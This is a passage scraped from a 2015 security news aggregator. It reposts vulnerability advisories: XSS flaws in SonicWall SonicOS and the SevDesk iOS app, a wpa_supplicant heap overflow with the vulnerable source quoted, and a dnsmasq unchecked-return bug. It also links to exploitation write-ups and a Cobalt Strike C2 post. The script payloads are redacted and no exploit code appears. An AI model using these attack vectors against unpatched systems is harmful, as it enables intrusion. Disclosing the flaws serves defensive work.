PageSeed=null; tabbedWinAlert=done; 1004=1; 1000=9; 777=1; __utmb=227649090.2.10.1417100584; __utmt=1; _gat=1]
      Connection[keep-alive]
   Response Header:
      Server[SonicWALL]
      Expires[-1]
      Cache-Control[no-cache]
      Content-Type[text/html; charset=UTF-8;]



-
Status: 200[OK] 
GET https://cas.127.0.0.1:8080/[CLIENT-SIDE SCRIPT CODE EXECUTION!] Load Flags[LOAD_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[cas.127.0.0.1:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://cas.127.0.0.1:8080/macIpSpoofView.html?
mainFrameYAxis=0&startItem=0&startItemIpDet=0&currIfaceConfig=0&currIfaceConfigIndex=1&searchSpoof=%22%3E%3C[CLIENT-SIDE SCRIPT CODE INJECTION!]&searchSpoofIpDet=]

Cookie[__utma=227649090.564465250.1416863624.1416863624.1416865480.2; __utmc=227649090; __utmz=227649090.1416863624.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 
__utmv=227649090.|1=User%3AUnkown=Unknown=1; referreringDomain=; SonicwallReferreringDomain=70160000000jxw7; _ga=GA1.2.564465250.1416863624; s_fid=23E57A7F416D34BD-3112FD9D33A8F2CA; 
s_cc=true; mbox=check#true#1416865554|session#1416865493280-142580#1416867354|PC#1416865493280-142580.26_06#1418075095; s_nr=1416865503646; s_getval=backlink; 
s_ppv=marketing.sonicwall.com%2Fregister%2F69295; s_sq=%5B%5BB%5D%5D; s_c49=c%3Dus%26l%3Den%26s%3Dcorp; cidlid=%3A%3A; s_channelstack=%5B%5B'Referrers'%2C'1416865503950'%5D%5D; 
sessionTime=2014%2C10%2C24%2C22%2C45%2C3%2C950; s_hwp=null%7C%7Cnull%7C%7C24%3A11%3A2014%3A22%3A45%7C%7CN%7C%7CN%7C%7Cnull%7C%7C0%7C%7Cnull%7C%7Cnull%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; 
s_sv_sid=75828994935; s_sv_112_p1=1@11@s/15062&e/2; s_sv_112_s1=1@16@a//1416865504579; curUrl=macIpSpoofView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 1004=1; 1000=9; 777=1]
      Connection[keep-alive]
   Response Header:
      Server[SonicWALL]
      Expires[-1]
      Cache-Control[no-cache]
      Content-Type[text/html;charset=UTF-8]


Reference(s):
https://cas.127.0.0.1:8080/
https://cas.127.0.0.1:8080/macIpSpoofView.html
https://cas.127.0.0.1:8080/macIpSpoofView.html?mainFrameYAxis=0&startItem=0&startItemIpDet=0


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable searchSpoof and searchSpoofIpDet parameters.
Restrict the input of the values and encode the output context of the macipspoofview.html to prevent client-side or application-side script code injection attacks.


Security Risk:
==============
The security risk of the cross site scripting web vulnerability in the macipspoofview.html file is estimated as medium. (CVSS 3.0)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com    - www.vuln-lab.com            - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com  - research@vulnerability-lab.com           - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php          - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab   - facebook.com/VulnerabilityLab           - youtube.com/user/vulnerability0lab
Feeds:     vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php     - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php   - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

    Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

↧

SevDesk v1.1 iOS - Persistent Dashboard Vulnerability

April 23, 2015, 4:00 am

≫ Next: Ubuntu local privilege escalation

≪ Previous: SonicWall SonicOS 7.5.0.12 & 6.x - Cross Site Vulnerability

Document Title:
===============
SevDesk v1.1 iOS - Persistent Dashboard Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1311


Release Date:
=============
2015-04-23


Vulnerability Laboratory ID (VL-ID):
====================================
1311


Common Vulnerability Scoring System:
====================================
4.2


Product & Service Introduction:
===============================
Official app for mobile use of sevDesk. A product of SEVENIT GmbH. 

Daily Backup
256bit SSL encryption
TÜV certified data center

Free version
No hidden costs
No minimum contract term

iPhone App
Runs in any browser
No installation required on the PC

Easy to use
Reduced to the essentials
Automated, where it is only possible

(Copy of the Vendor Homepage: https://sevdesk.de/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official SEVENIT GmbH SevDesk mobile application (api).


Vulnerability Disclosure Timeline:
==================================
2014-09-01: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-09-02: Vendor Notification (SevDesk Developer Team)
2015-04-23: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
SevenIT
Product: SevDesk - iOS Mobile Web Application (API) 1.1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official SEVENIT Software GmbH sevDesk v1.1 iOS mobile web-application (api).
The vulnerability allows remote attackers or low privileged user account to inject own malicious script codes to the application-side of the vulnerable 
web-application module or service.

The security vulnerability is located in the `firstname` values of the main sevDesk `Dasboard` application module & api. Remote attackers are able to inject 
own script codes to the mobile dashboard through the api by manipulation of the registration information in the client.

The execution of the script code occurs after the inject on the application-side in the main mobile dashboard status list. If the test user account apply for 
any changes in the account profile the activity becomes visible. In the context were the information and details becomes visible is the location were the 
execution of the persistent injected script code takes place. The attack vector is persistent and the request method to inject the code is POST. 

The security risk of the persistent script code inject web vulnerability is estimated as meidum with a cvss (common vulnerability scoring system) count of 4.2. 
Exploitation of the persistent input validation web vulnerability requires a low privileged sevdesk user account with restricted access and low user interaction. 
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious source and persistent 
manipulation of affected or connected application modules (api).

Request Method(s):
    [+] POST

Vulnerable Application(s):
    [+] sevDesk v1.1 iOS

Vulnerable Module(s):
    [+] Registration to SevDesk

Vulnerable Parameter(s):
    [+] firstname (display name)

Affected Module(s):
    [+] Dasboard Index Status List


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

1. Install the application to your iOS device (ipad iphone)
2. Register an new account 
3. Include as name value your own malicious script code payload
4. Save the settings and open the Dasboard status listing
Note: After the save the context gets discplayed by the mobile app api through the web database
5. The script code execution occurs in the main status messages
6. Successful reproduce of the security vulnerability in the mobile iOS application!


Picture(s):
   ../1.png
   ../2.png
   ../3.png


Solution - Fix & Patch:
=======================
The issue can be patched by a secure parse and encode of the user credentials on registration through the mobile application api.
Restrict the user input to register and parse also the status listing in the main dasboard which becomes visible after the malicious changes.


Security Risk:
==============
The security risk of the persistent mobile web vulnerability in the api is estimated as medium. (CVSS 4.2)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com    - www.vuln-lab.com            - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com  - research@vulnerability-lab.com           - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php          - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab   - facebook.com/VulnerabilityLab           - youtube.com/user/vulnerability0lab
Feeds:     vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php     - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php   - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

    Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

↧

Ubuntu local privilege escalation

April 23, 2015, 4:05 am

≫ Next: Visualizing a single null-byte heap overflow exploitation

≪ Previous: SevDesk v1.1 iOS - Persistent Dashboard Vulnerability

Ubuntu local privilege escalation reported by Tavis Ormandy that this is still not patched. (includes PoC) here......http://www.openwall.com/lists/oss-security/2015/04/22/12

↧

Visualizing a single null-byte heap overflow exploitation

April 23, 2015, 6:39 am

≫ Next: Android wpa_supplicant WLAN Direct remote buffer overflow

≪ Previous: Ubuntu local privilege escalation

When Phantasmal Phantasmagoria wrote The Malloc Malleficarum back in 2005 he exposed several ways of gaining control of an exploitation through corruption of the internal state of the libc memory allocator. Ten years later people are still exploring the possibilities offered by such complex data structures. In this article I will present how I solved a challenge from Plaid CTF 2015 and the tool I wrote in the process.

Phantasmal's paper addressed the patches by libc developers to address previous exploitation techniques. Some of the insights he presented are still relevant and people continue go further but new techniques emerged. Project Zero gave a good example of this with The Poisoned NUL Byte which they presented in 2014.

Quick fuzzing of the target reveals some memory errors

more here........http://wapiflapi.github.io/2015/04/22/single-null-byte-heap-overflow/

↧

Android wpa_supplicant WLAN Direct remote buffer overflow

April 23, 2015, 6:44 am

≫ Next: Dnsmasq 2.72 Unchecked returned value

≪ Previous: Visualizing a single null-byte heap overflow exploitation

1. Advisory Information
Advisory URL: http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.p1ECc3&id=19
Date published: 2015-04-23
Date of last update: 2015-04-23

2. Vulnerability Information
Class: heap overflow
Impact: memory information leak and remote code execution
Remote Exploitable: Yes
Local Exploitable: No
CVE Name: CVE-2015-1863
Vulnerability Information and Patch: http://w1.fi/security/2015-1/

3. Vulnerability Description
　　In Android, wpa_supplicant is designed to be a "daemon" program that runs in the background and acts as the backend 
component controlling the wireless connection.. When WLAN Direct function of wpa_supplicant is enabled, a malformed p2p 
invitation type packet with long ssid can trigger a heap overflow vulnerability. An attacker could launch a remote 
attack in the wireless device signal coverage, access to the victim's android device and execute native code with the 
corresponding user privileges (in the android is wifi user). The user has permission to read the saved WIFI password, 
change network configuration, hijacking all Wi-Fi traffic. When combined with a local privilege escalation 
vulnerability that allows an attacker to remotely control a host of victims, implant Trojans and other underlying 
implant systems.
4. Vulnerable Packages
 Android 4/Android 5
 wpa_supplicant 2.x
5. Credits
Smart hardware research group of Alibaba security team for discovering the vulnerability.
6. Technical Description
 wpa_supplicant malloc a p2p_device structure, the oper_ssid field size of which is 0x20 bytes. In the p2p invitation 
packet the size of ssid field is described with an octet, the max of which is 0xff. When copy to oper_ssid field, the 
length is not checked. When the size of ssid exceeds 0x20 bytes, it can overflow other fields of the p2p_device 
structure and overflow heap structure when exceeds 0x40 bytes.
    In the android version 5.1, the source is:
============ p2p_device structure（ wpa_supplicant/p2p/p2p_i.h)============
struct p2p_device {
    [……….]
    int oper_freq;
    u8 oper_ssid[32];  <----- fixed 0x20 bytes 
    size_t oper_ssid_len;
       [……….]
    /**
    * go_neg_conf - GO Negotiation Confirmation frame
    */
    struct wpabuf *go_neg_conf;
    int sd_pending_bcast_queries;
};
=========（wpa_supplicant/p2p/p2p.c p2p_add_device ==============
int p2p_add_device(struct p2p_data *p2p, const u8 *addr, int freq,
          struct os_reltime *rx_time, int level, const u8 *ies,
          size_t ies_len, int scan_res)
{
    [……….]
    if (os_memcmp(addr, p2p_dev_addr, ETH_ALEN) != 0)
       os_memcpy(dev->interface_addr, addr, ETH_ALEN);
    if (msg.ssid &&
        (msg.ssid[1] != P2P_WILDCARD_SSID_LEN ||
         os_memcmp(msg.ssid + 2, P2P_WILDCARD_SSID, P2P_WILDCARD_SSID_LEN)
         != 0)) {
        os_memcpy(dev->oper_ssid, msg.ssid + 2, msg.ssid[1]);
//the dest buf is 0x20, but the size is controlled by user input, trigger buffer overflow 
       dev->oper_ssid_len = msg.ssid[1];
    }
[……….]
7. Vulnerability Impact Assessment：
    1）Affected product：Affect all devices of android version below 5.1 
    2）Default configuration exploitable analysis：Although much of android devices enable WLAN direct when user enters 
WLAN Direct UI, but: 
    We found some models of well-known mobile phone manufacturers (such as Xiaomi, Huawei), default to open the WLAN 
Direct. Even if the user 
never entered the WLAN Direct UI, the attacker can initiate a WLAN direct connection and trigger this vulnerability 
without user interaction. However, 
an attacker needs to know WLAN Direct MAC address, the address is the MAC address of user equipment with first byte OR 
2, MAC address of the user 
equipment can acquire easily by WIFI packet sniffer, so you can calculate WLAN Direct MAC address, for example the user 
device MAC address 14: 12: 34: 56: 78: 90, 
then WLAN Direct MAC address is 16:12 : 34: 56: 78: 90, which means that some models of mobile phone, simply open the 
WIFI service, can suffer from the vulnerability attack.
　　For other models without WLAN Direct default enabled need to pay attention, because a lot of file transfer software 
use WLAN Direct feature and will enable it. 
And this feature once enabled, even if the user exits the WLAN Direct UI, the feature is enabled until the device 
reboot or WIFI restart. During this time the device is affected and can be attack remotely.
    3）Impact
    This vulnerability can leak information, use leaked information with ROP to bypass ASLR and DEP. Exploit this 
vulnerability successfully, attackers can execute
 native code with wifi user permission. Then with wifi user permission can change wifi configuration and hijack network 
traffic. 
    And this vulnerability can be exploited remotely, if composite a local privilege escalation vulnerability, 
attackers can implant trojan without physically touch victim devices. 
  So this vulnerability is high risk, especially for wlan direct enabled default devices. 
8. Poc and Coredump 
    See Advisory URL: http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.p1ECc3&id=19
9. Report Timeline
 2015-4-3：send vulnerability report to android security team
 2015-4-8：android security team acknowledges the vulnerability and forward it to wpa_supplicant maintainer
 2015-4-8：wpa_supplicant maintainer acknowledges
 2015-4-13：wpa_supplicant maintainer acknowledges timeline for release a fix
 2015-4-22：wpa_supplicant maintainer publish the fix and security advisory
 2015-4-23：The advisory is published

↧

Dnsmasq 2.72 Unchecked returned value

April 23, 2015, 6:49 am

≫ Next: Lack of Android Updates Come Under FTC Scrutiny?

≪ Previous: Android wpa_supplicant WLAN Direct remote buffer overflow

Dnsmasq provides network infrastructure for small networks: DNS, DHCP, router advertisementand network boot.(Source: http://www.thekelleys.org.uk/dnsmasq/doc.html)

"Dnsmasq 2.72 Unchecked returned value"

Description
------------------------------------------------------------
Dnsmasq does not properly check the return value of the setup_reply()
function called during a tcp connection (by the tcp_request() function).
This return value is then used as a size argument in a function which writes
data on the client's connection.  This may lead, upon successful
exploitation, to reading the heap memory of dnsmasq.

In more detail:
Function tcp_request() calls setup_reply() and the returned value is used as
a size argument in a write function.

m = setup_reply(header, (unsigned int)size, addrp, flags,
daemon->local_ttl);
read_write(confd, packet, m + sizeof(u16), 0));

The m variable is determined by a subtraction between the
return of  skip_questions() and header pointer.
The return value of skip_question doesn't checked for error(NULL).
As a result the negative value of pointer(-header), might returned.

size_t setup_reply(struct dns_header *header, size_t qlen,
struct all_addr *addrp, unsigned int flags, unsigned long ttl)
{
       unsigned char *p = skip_questions(header, qlen)
       return p - (unsigned char *)header
}

read_write checks if the size argument is positive. In case of a 32 bit
system
size_t m would be 4 bytes and read_write will automatically exit. In case of
64
bit system size_t m is 8 bytes and may turn to positive if the sign bit of
the
32 bit value is 0.

If m is less than 0xffffffff80000000, dnsmasq will be exploited by a
potential attacker who will remotely read dnsmasq heap. If the above
condition is not met, dnsmasq exits properly.

Researcher
------------------------------------------------------------
Nick Sampanis (n.sampanis[a t]obrela[do t]com)


Vulnerability
------------------------------------------------------------
Unchecked return value CVE-2015-3294

Identification date:
------------------------------------------------------------
07/04/2015 - 09/04/2015

Solution - fix & patch
------------------------------------------------------------
Please download dnsmasq-2.73rc4.tar.gz

Reference:
------------------------------------------------------------
http://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2015q2/009382.html
https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-1502/

↧

Lack of Android Updates Come Under FTC Scrutiny?

April 23, 2015, 7:20 am

≫ Next: New Threat Report Via F-Secure

≪ Previous: Dnsmasq 2.72 Unchecked returned value

Last week, a rather interesting complaint was filed before the Federal Trade Commission. In a 16-page complaint, the American Civil Liberties Union described the lack of updates for many Android devices as “unfair and deceptive business practices”. The complaint went on to ask the respondents (the top four wireless carriers in the United States) to let customers with unpatched (and vulnerable) devices out of their contracts early.

more here........http://blog.trendmicro.com/trendlabs-security-intelligence/lack-of-android-updates-to-come-under-ftc-scrutiny/

↧

New Threat Report Via F-Secure

April 23, 2015, 7:26 am

≫ Next: Some Recent RSA 2015 Conference Uploaded Video's

≪ Previous: Lack of Android Updates Come Under FTC Scrutiny?

The security firms comprehensive threat report, based on its analysis of H2 2014 data, is now available here......https://www.f-secure.com/documents/996508/1030743/Threat_Report_H2_2014

H2 2014 Threat Report At A Glance

↧

Some Recent RSA 2015 Conference Uploaded Video's

April 23, 2015, 9:56 am

≫ Next: Paper: Breaking the Rabin-Williams digital signature system implementation in the Crypto++ library

≪ Previous: New Threat Report Via F-Secure

Quantitative Security: Using Moneyball Techniques to Defend Corporate Networks -
In “Moneyball,” Michael Lewis describes how a sports team used data analytics to field the best possible players. Can this quantitative approach help a company achieve the highest possible level of security? Amit Mital will discuss how advanced data mining on massive amounts of security intelligence will help organizations thwart even the most complex attacks on their systems and information. more here...........http://www.rsaconference.com/media/quantitative-security-using-moneyball-techniques-to-defend-corporate-networks

Talking ’bout My Next Generation
Who would’ve thought a 50-year-old song would’ve been the perfect descriptor for how cyber security practitioners sometimes feel viewed by the rest of the world? In the immortal words of The Who, “People try to put us down.” Come hear about what’s next for cyber security. The answer might surprise you and “cause a big sensation.” more here......http://www.rsaconference.com/media/talking-bout-my-next-generation

Welcome to the New School of Cyber Defense
The old school of cyber defense emphasized securing infrastructure and restricting data flows. But data needs to run freely to power our organizations. The new school of cyber defense calls for security that is agile and intelligent. It emphasizes protecting the interactions between our users, our applications and our data. The world has changed, and we must change the way we secure it. more here....http://www.rsaconference.com/media/welcome-to-the-new-school-of-cyber-defense

Pass-the-Hash II
Abbreviated version of Pass-the-Hash II: The Wrath of Hardware with Nathan Ide, Principal Development Lead, Microsoft. more here.........https://www.youtube.com/watch?v=K21J5X4HO04

↧

Paper: Breaking the Rabin-Williams digital signature system implementation in the Crypto++ library

April 23, 2015, 7:36 am

≫ Next: User-defined Storage-based Covert Communication

≪ Previous: Some Recent RSA 2015 Conference Uploaded Video's

This paper describes a bug in the implementation of the RabinWilliams
digital signature in the Crypto++ framework. The bug is in
the misuse of blinding technique that is aimed at preventing timing
attacks on the digital signature system implementation, but eventually
results in an opportunity to find the private key having only two
different signatures of the same message. The CVE identifier of the
issue is CVE-2015-2141.

more here........https://eprint.iacr.org/2015/368.pdf

↧

User-defined Storage-based Covert Communication

April 23, 2015, 7:41 am

≫ Next: pgcli

≪ Previous: Paper: Breaking the Rabin-Williams digital signature system implementation in the Crypto++ library

One of my favorite Cobalt Strike technologies is Malleable C2. This is a domain specific language for user-defined storage-based covert communication. That’s just a fancy way of saying that you, the operator, have control over what Cobalt Strike’s Beacon looks like when it communicates with you.

more here.......http://blog.cobaltstrike.com/2015/04/23/user-defined-storage-based-covert-communication/

malleablec2

↧